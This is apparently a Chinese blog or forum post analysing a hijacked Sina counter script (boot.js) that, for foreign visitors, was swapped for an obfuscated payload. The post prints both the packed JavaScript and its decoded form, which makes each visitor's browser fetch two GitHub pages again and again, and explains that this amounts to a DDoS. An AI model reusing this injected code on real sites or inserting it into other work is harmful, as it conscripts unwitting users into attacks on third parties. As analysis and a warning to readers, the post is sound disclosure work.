这样的js拦截

http://sjs.sinajs.cn/blog7common/js/boot.js 

使用国外IP访问，可得到拦截修改后的js，

eval(function(p, a, c, k, e, r) {

    e = function(c) {

        return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))

    };

    if (!''.replace(/^/, String)) {

        while (c--)

            r[e(c)] = k[c] || e(c);

        k = [function(e) {

                return r[e]

            }];

        e = function() {

            return '\\w+'

        };

        c = 1

    }

    ;

    while (c--)

        if (k[c])

            p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);

    return p

}('l.k("<5 p=\'r://H.B.9/8/2.0.0/8.C.t\'>\\h/5>");!J.K&&l.k("<5 p=\'r://L.8.9/8-T.t\'>\\h/5>");j=(6 4).c();7 g=0;3 i(){7 a=6 4;V 4.Z(a.10(),a.w(),a.x(),a.11(),a.y(),a.z())/A}d=["m://n.9/E","m://n.9/F-G"];o=d.I;3 e(){7 a=i()%o;q(d[a])}3 q(a){7 b;$.M({N:a,O:"5",P:Q,R:!0,S:3(){s=(6 4).c()},U:3(){f=(6 4).c();b=W.X(f-s);Y>f-j&&(u(b),g+=1)}})}3 u(a){v("e()",a)}v("e()",D);', 62, 64, '|||function|Date|script|new|var|jquery|com|||getTime|url_array|r_send2|responseTime|count|x3c|unixtime|startime|write|document|https|github|NUM|src|get|http|requestTime|js|r_send|setTimeout|getMonth|getDay|getMinutes|getSeconds|1E3|baidu|min|2E3|greatfire|cn|nytimes|libs|length|window|jQuery|code|ajax|url|dataType|timeout|1E4|cache|beforeSend|latest|complete|return|Math|floor|3E5|UTC|getFullYear|getHours'.split('|'), 0, {})) 

进行解密后，得到

document.write("<script src='http://libs.baidu.com/jquery/2.0.0/jquery.min.js'>\x3c/script>"); ! window.jQuery && document.write("<script src='http://code.jquery.com/jquery-latest.js'>\x3c/script>");

startime = (new Date).getTime();

var count = 0;

function unixtime() {

    var a = new Date;

    return Date.UTC(a.getFullYear(), a.getMonth(), a.getDay(), a.getHours(), a.getMinutes(), a.getSeconds()) / 1E3

}

url_array = ["https://github.com/greatfire", "https://github.com/cn-nytimes"];

NUM = url_array.length;

function r_send2() {

    var a = unixtime() % NUM;

    get(url_array[a])

}

function get(a) {

    var b;

    $.ajax({

        url: a,

        dataType: "script",

        timeout: 1E4,

        cache: !0,

        beforeSend: function() {

            requestTime = (new Date).getTime()

        },

        complete: function() {

            responseTime = (new Date).getTime();

            b = Math.floor(responseTime - requestTime);

            3E5 > responseTime - startime && (r_send(b), count += 1)

        }

    })

}

function r_send(a) {

    setTimeout("r_send2()", a)

}

setTimeout("r_send2()", 2E3);

上面的意思是，对

https://github.com/greatfire", "https://github.com/cn-nytimes"

这两个网址，隔几秒循环访问一次。从而借助所有上网用户形成DDOS攻击

继续在搞啊

(http://sjs.sinajs.cn/blog7common/js/boot.js)是sina的计数器，大量引用在各种sina业务中，还是和前几天baidu计数器仅针对国外IP一样，眼前这个改写法了。这种搞法，是否除了DDOS github，还能把你的跳板给记录了呢？生活已不易，上网需谨慎，且行且珍惜。